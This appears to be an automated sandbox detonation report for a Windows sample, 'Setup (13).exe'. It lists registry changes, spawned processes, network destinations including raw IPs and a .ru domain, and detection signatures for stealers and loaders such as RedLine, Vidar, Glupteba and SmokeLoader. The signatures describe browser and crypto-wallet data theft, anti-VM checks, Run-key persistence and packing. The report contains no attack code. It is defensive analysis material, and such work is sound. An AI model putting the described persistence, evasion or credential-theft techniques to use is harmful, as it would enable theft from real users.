| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4584 wrote to memory of 4624 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (13).exe |
| PID 4584 wrote to memory of 4624 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (13).exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (13).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (13).exe"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv R3q930x020WnyfI9gsy3Ow.0.2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4624 -ip 4624
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 1560
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
Network
| Country | Destination | Domain | Proto |
| N/A | 51.124.78.146:443 | tcp | |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 131.253.33.203:80 | oneocsp.microsoft.com | tcp |
| N/A | 23.217.250.58:80 | go.microsoft.com | tcp |
| N/A | 20.189.173.14:443 | tcp | |
| N/A | 20.189.118.208:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | tcp | |
| N/A | 20.54.110.119:443 | tsfe.trafficshaping.dsp.mp.microsoft.com | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 40.125.122.151:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | tcp | |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 127.0.0.1:5985 | tcp |
Files
memory/4184-146-0x000001A24DB60000-0x000001A24DB70000-memory.dmp
memory/4184-147-0x000001A24DBE0000-0x000001A24DBF0000-memory.dmp
memory/4184-148-0x000001A24DF70000-0x000001A24DF74000-memory.dmp
memory/4184-149-0x000001A250460000-0x000001A250464000-memory.dmp
memory/4184-150-0x000001A250420000-0x000001A250421000-memory.dmp
memory/4184-151-0x000001A24DFA0000-0x000001A24DFA4000-memory.dmp
memory/4184-152-0x000001A24DF90000-0x000001A24DF91000-memory.dmp
memory/4184-153-0x000001A24DF90000-0x000001A24DF94000-memory.dmp
memory/4184-154-0x000001A24DE70000-0x000001A24DE71000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2021-08-22 20:10
Reported
2021-08-22 20:41
Platform
win11
Max time kernel
207s
Max time network
1817s
Command Line
Signatures
Glupteba
Glupteba Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies Windows Defender Real-time Protection settings
NetSupport
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe |
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Socelars
Suspicious use of NtCreateProcessExOtherParentProcess
Vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\NQcQzWXtpEGKMyTl5AoE7i7S.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\dFccDEsRk7gTNKAD1oSb2EAT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\pwyIFxlcMhdwsR3wLrcsfQXl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\Qnqphm6SOYhH73CSsJ4bFUPP.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\uIVM5UX3s2Mhr_WMWbjqOR4I.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\pwyIFxlcMhdwsR3wLrcsfQXl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\uIVM5UX3s2Mhr_WMWbjqOR4I.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\NQcQzWXtpEGKMyTl5AoE7i7S.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\Oe88DJ3T4iLGbzGvVo7dJ4a5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\MkQEUdYdZt91PK1nMLyyiXOT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\dFccDEsRk7gTNKAD1oSb2EAT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\Oe88DJ3T4iLGbzGvVo7dJ4a5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\MkQEUdYdZt91PK1nMLyyiXOT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\lMRrZ8za0XNxp4HVQbeIHCR5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\lMRrZ8za0XNxp4HVQbeIHCR5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\Qnqphm6SOYhH73CSsJ4bFUPP.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\NQcQzWXtpEGKMyTl5AoE7i7S.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\MkQEUdYdZt91PK1nMLyyiXOT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\Qnqphm6SOYhH73CSsJ4bFUPP.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\uIVM5UX3s2Mhr_WMWbjqOR4I.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\Oe88DJ3T4iLGbzGvVo7dJ4a5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\dFccDEsRk7gTNKAD1oSb2EAT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\pwyIFxlcMhdwsR3wLrcsfQXl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\lMRrZ8za0XNxp4HVQbeIHCR5.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | geoiptool.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\uIVM5UX3s2Mhr_WMWbjqOR4I.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\NQcQzWXtpEGKMyTl5AoE7i7S.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\dFccDEsRk7gTNKAD1oSb2EAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\Oe88DJ3T4iLGbzGvVo7dJ4a5.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\MkQEUdYdZt91PK1nMLyyiXOT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\pwyIFxlcMhdwsR3wLrcsfQXl.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\Qnqphm6SOYhH73CSsJ4bFUPP.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\lMRrZ8za0XNxp4HVQbeIHCR5.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\jooyu.exe | C:\Users\Admin\Documents\d1cSuepKgtvUWoz3bgL2bjmy.exe | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | C:\Users\Admin\Documents\d1cSuepKgtvUWoz3bgL2bjmy.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe | C:\Users\Admin\AppData\Local\Temp\is-N12DA.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\INL Corpo Brovse\libcueify.dll | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\Uninstall.exe | C:\Users\Admin\Documents\d1cSuepKgtvUWoz3bgL2bjmy.exe | N/A |
| File opened for modification | C:\Program Files (x86)\INL Corpo Brovse\libass.dll | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\INL Corpo Brovse\is-JTHTK.tmp | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | C:\Users\Admin\Documents\d1cSuepKgtvUWoz3bgL2bjmy.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\INL Corpo Brovse\QtProfiler.exe | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\INL Corpo Brovse\is-62Q93.tmp | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\INL Corpo Brovse\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\INL Corpo Brovse\is-CS31B.tmp | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | C:\Users\Admin\Documents\d1cSuepKgtvUWoz3bgL2bjmy.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\INL Corpo Brovse\is-D2QJE.tmp | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\jooyu.exe | C:\Users\Admin\Documents\nccW3LP_L5VPMq0je0USgUGw.exe | N/A |
| File opened for modification | C:\Program Files (x86)\INL Corpo Brovse\javaw.exe | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\INL Corpo Brovse\is-IGLE6.tmp | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\INL Corpo Brovse\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\57cA8QoO2k9yfbIsbLc4JUjp.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\57cA8QoO2k9yfbIsbLc4JUjp.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\57cA8QoO2k9yfbIsbLc4JUjp.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
